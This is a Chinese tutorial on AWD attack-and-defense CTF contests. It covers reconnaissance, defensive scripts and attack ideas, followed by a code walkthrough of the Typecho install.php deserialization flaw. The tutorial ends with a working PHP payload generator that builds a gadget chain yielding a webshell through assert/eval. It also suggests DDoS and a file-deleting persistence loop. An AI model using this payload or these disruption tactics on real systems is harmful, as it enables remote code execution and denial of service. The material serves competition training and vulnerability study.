AWD入门教程

信息收集

前言

我开始之前，会有一定的时间留给我们进行加固，在这段时间里，彼此之间是没法进行攻击的，所以我们要利用好这段时间，收集足够的信息，我把需要收集的信息总结为以下几点。

在开始前，我们可以去查看web端的配置文件，那里面会有数据库的账号和密码，然后我们通过这个账号密码进行登录，就可以去查找后台的账号和密码，可以在后续对其他队伍进行一个测试，看是有账号密码系统的情况。

我们可以通过探测自己主机上的端口，看是否存在某些端口上开着存在漏洞的服务。主要用到的工具是nmap。

web框架信息的收集也很重要，很多时候，web环境就是一存在历史漏洞的web框架，我们可以通过去网上搜索相关的漏洞信息，以做到防御自身和攻击他人。主要可以通过查看文件是否有作者或框架的信息，或可以通过浏览器的插件Wappalyzer

4.URL信息收集

主要是收集其他战队的url信息。

防御

前言

其实防御我感觉是整个环境中比较好做的，为什么这么说呢，如果只有web环境的情况下，我们一般挂上一两个脚本就能防御大多数的攻击。这里介绍一下几个需要的功能，这些功能的脚本github上都有，大家可以自行下载测试。

web环境一般大多数是php语言的，这时候我们可以在网站的入口处，导入我们写入的waf，通过对传入参数的清洗，就能隔绝掉很多攻击，比如虽然在某个文件有漏洞，但是其流量都要经过waf.php的清晰，哪怕漏洞存在都不会被利用。

这个脚本主要是对web目录的一个监控，防止web文件被人恶意的篡改，也防止被人上传木马，可以使用python来编写。

这个脚本就有点恶心，主要是你可以通过python搭建一个http服务器，然后监控http流量，当流量中有flag的数据，就可以替换为其他的，达到一个防御的效果。

4.修改账号密码

这个也是很重要的，一般情况下，后台账号密码可能存在弱密码的情况，但是在数据库中的密码可能是以hash加密的形式存储的，这时候如果我们直接修改，就会导致出错，所以这里我们可以直接修改用户名，把用户名改掉也能防御爆破。

攻击

前言

攻击的话相对来说其攻击点一般已经是固定了的，要么是存在问题的端口，要么是存在问题的框架，如果在这几个地方做了死防，攻击基本可以说已经没有任何用处了(ps:这是我个人觉得),当然，在awd中，让对方服务掉线也是一种加分方式，可以尝试对其web服务发起大量请求的方式，让对方掉线，这样在进行检查的时候，由于服务不存在，就会减分，然后平均分配给其他战队，这边简单的说一下攻击的思路。

这可以说是每次拿到代码必须做的事情了，通过代码审计，我们可以找到框架中存在的漏洞，可以发现是否有webshell的存在，这样可以及时的对代码进行修复。

如何去应对我上面防御部分的第三点呢，因为我们知道，每一次系统都会对web服务进行检测，那我们在拿到对方shell的时候，我们可以在tmp目录写一个python文件，让其死循环判断web某个文件是否存在，存在则删除，这样的话就可以达到让对方服务出错扣分。

ddos也是可以用的，但是这也是非常万不得已的情况下了。

复盘

前言

昨天进行了一场队内的awd对抗赛，这次的对抗赛我觉得没太多的意思，因为其实其中的利用点只有一个，那就是框架的历史漏洞，这里对这个漏洞再进行一次分析。

Typecho框架的反序列化漏洞。

//省略
//判断是否已经安装
if (!isset($_GET['finish']) && file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') && empty($_SESSION['typecho'])) {
    exit;
}
//省略
 <?php else : ?>
                    <?php
                    $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho_config')));
                    Typecho_Cookie::delete('__typecho_config');
                    $db = new Typecho_Db($config['adapter'], $config['prefix']);
                    $db->addServer($config, Typecho_Db::READ | Typecho_Db::WRITE);
                    Typecho_Db::set($db);
                    ?>

• install.php是入口点，我们会发现，我们直接访问的话，会因为exit而退出程序，但是我们发现只需要通过get传参，传入一个finish就能继续执行下面的程序。我们继续看，下面对Typecho_Cookie::get('__typecho_config') 进行base64解码后反序列化。我们跟进一下Typecho_Cookie::get()方法。

public static function get($key, $default = NULL)
    {
        $key = self::$_prefix . $key;
        $value = isset($_COOKIE[$key]) ? $_COOKIE[$key] : (isset($_POST[$key]) ? $_POST[$key] : $default);
        return is_array($value) ? $default : $value;
    }

• 这边的话首先是判断Cookie是否有对应参数的值，如果没有的话则通过post传参的方式。判断是否为数组，是的话则返回值。

• 继续看上面的install.php，$db = new Typecho_Db($config['adapter'], $config['prefix']);把序列化后的数组的值传入，也就是这里我们是可控的，跟进Typecho_Db。

public function __construct($adapterName, $prefix = 'typecho_')
    {
        /** 获取适配器名称 */
        $this->_adapterName = $adapterName;

        /** 数据库适配器 */
        $adapterName = 'Typecho_Db_Adapter_' . $adapterName;

        if (!call_user_func(array($adapterName, 'isAvailable'))) {
            throw new Typecho_Db_Exception("Adapter {$adapterName} is not available");
        }

        $this->_prefix = $prefix;

        /** 初始化内部变量 */
        $this->_pool = array();
        $this->_connectedPool = array();
        $this->_config = array();

        //实例化适配器对象
        $this->_adapter = new $adapterName();
    }

• 这时候假如$adapterName是个类的化，那么这里因为这个类被当作字符串，所以会调用__toString魔法方法。

foreach ($this->_items as $item) {
                $content .= '<entry>' . self::EOL;
                $content .= '<title type="html"><![CDATA[' . $item['title'] . ']]></title>' . self::EOL;
                $content .= '<link rel="alternate" type="text/html" href="' . $item['link'] . '" />' . self::EOL;
                $content .= '<id>' . $item['link'] . '</id>' . self::EOL;
                $content .= '<updated>' . $this->dateFormat($item['date']) . '</updated>' . self::EOL;
                $content .= '<published>' . $this->dateFormat($item['date']) . '</published>' . self::EOL;
                $content .= '<author>
    <name>' . $item['author']->screenName . '</name>
    <uri>' . $item['author']->url . '</uri>
</author>' . self::EOL;

• 我们会发现这里的itemp['author']为某个类，那么调用了不存在的成员就会执行__get方法，我们去看一下__get方法

public function get($key, $default = NULL)
    {
        switch (true) {
            case isset($this->_params[$key]):
                $value = $this->_params[$key];
                break;
            case isset(self::$_httpParams[$key]):
                $value = self::$_httpParams[$key];
                break;
            default:
                $value = $default;
                break;
        }

        $value = !is_array($value) && strlen($value) > 0 ? $value : $default;
        return $this->_applyFilter($value);
    }

• 我们发现这里把我们传入的值传入到了_applyFilter方法,我们继续跟进

private function _applyFilter($value)
    {
        if ($this->_filter) {
            foreach ($this->_filter as $filter) {
                $value = is_array($value) ? array_map($filter, $value) :
                call_user_func($filter, $value);
            }

            $this->_filter = array();
        }

        return $value;
    }

• 我们发现，这里执行了一个回调函数，下面是一个网上的payload。

<?php
class Typecho_Feed
{
        const RSS1 = 'RSS 1.0';
        const RSS2 = 'RSS 2.0';
        const ATOM1 = 'ATOM 1.0';
        const DATE_RFC822 = 'r';
        const DATE_W3CDTF = 'c';
        const EOL = "n";
        private $_type;
        private $_items;

        public function __construct() {
                $this->_type = $this::RSS2;
                #$this->_type = $this::ATOM1;
                $this->_items[0] = array(
                        'category' => array(new Typecho_Request()),
                        'author' => new Typecho_Request(),
                );
        }
}
class Typecho_Request
{
        private $_params = array();
        private $_filter = array();

        public function __construct() {
                $this->_params['screenName'] = 'eval($_POST[8])';
                $this->_filter[0] = 'assert';
        }
}

$exp = array(
        'adapter' => new Typecho_Feed(),
        'prefix'  => 'typecho_'
);

echo base64_encode(serialize($exp));
?>